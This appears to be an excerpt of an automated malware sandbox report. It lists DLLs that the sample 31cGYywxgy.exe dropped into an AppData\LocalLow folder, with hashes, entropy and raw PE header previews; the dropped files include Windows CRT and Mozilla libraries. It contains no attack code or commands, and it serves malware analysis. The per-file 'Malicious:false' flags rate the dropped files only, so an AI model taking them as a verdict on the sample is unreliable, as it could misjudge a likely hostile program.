                                                                                                  SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                                                  MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                                                  SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                                                  SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                                                  SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):28984
                                                                                                  Entropy (8bit):6.6686462438397
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                                                  MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                                                  SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                                                  SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                                                  SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26424
                                                                                                  Entropy (8bit):6.712286643697659
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                                                  MD5:35FC66BD813D0F126883E695664E7B83
                                                                                                  SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                                                  SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                                                  SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):73016
                                                                                                  Entropy (8bit):5.838702055399663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                                                  MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                                                  SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                                                  SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                                                  SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19256
                                                                                                  Entropy (8bit):7.076072254895036
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                                                  MD5:8D02DD4C29BD490E672D271700511371
                                                                                                  SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                                                  SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                                                  SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22840
                                                                                                  Entropy (8bit):6.942029615075195
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                                                  MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                                                  SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                                                  SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                                                  SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24368
                                                                                                  Entropy (8bit):6.873960147000383
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                                                  MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                                                  SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                                                  SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                                                  SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23488
                                                                                                  Entropy (8bit):6.840671293766487
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                                                  MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                                                  SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                                                  SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                                                  SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.018061005886957
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                                                  MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                                                  SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                                                  SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                                                  SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.127951145819804
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                                                  MD5:B52A0CA52C9C207874639B62B6082242
                                                                                                  SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                                                  SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                                                  SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):117712
                                                                                                  Entropy (8bit):6.598338256653691
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                  MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                  SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                  SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                  SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{*7.{*7.{*..x+>.{*..~+I.{*...+%.{*.x+$.{*..+'.{*.~+..{*..z+4.{*7.z*A.{*..~+>.{*..{+6.{*...*6.{*..y+6.{*Rich7.{*........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):334288
                                                                                                  Entropy (8bit):6.808908775107082
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                  MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                  SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                  SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                  SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):132048
                                                                                                  Entropy (8bit):6.627391684128337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                  MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                  SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                  SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                  SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S|.>R..?S;..S..?S|.<R..?S|.:R..?S|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20432
                                                                                                  Entropy (8bit):6.337521751154348
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                  MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                  SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                  SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                  SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55760
                                                                                                  Entropy (8bit):6.738700405402967
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                  MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                  SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                  SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                  SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22480
                                                                                                  Entropy (8bit):6.528357540966124
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                  MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                  SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                  SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                  SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83408
                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83408
                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                  Malicious:false
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll
                                                                                                  Process:C:\Users\user\Desktop\31cGYywxgy.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):137168
                                                                                                  Entropy (8bit):6.784614237836286
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
                                                                                                  MD5:EAE9273F8CDCF9321C6C37C244773139
                                                                                                  SHA1:8378E2A2F3635574C106EEA8419B5EB00B8489B0
                                                                                                  SHA-256:A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
                                                                                                  SHA-512:06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
                                                                                                  Malicious:false
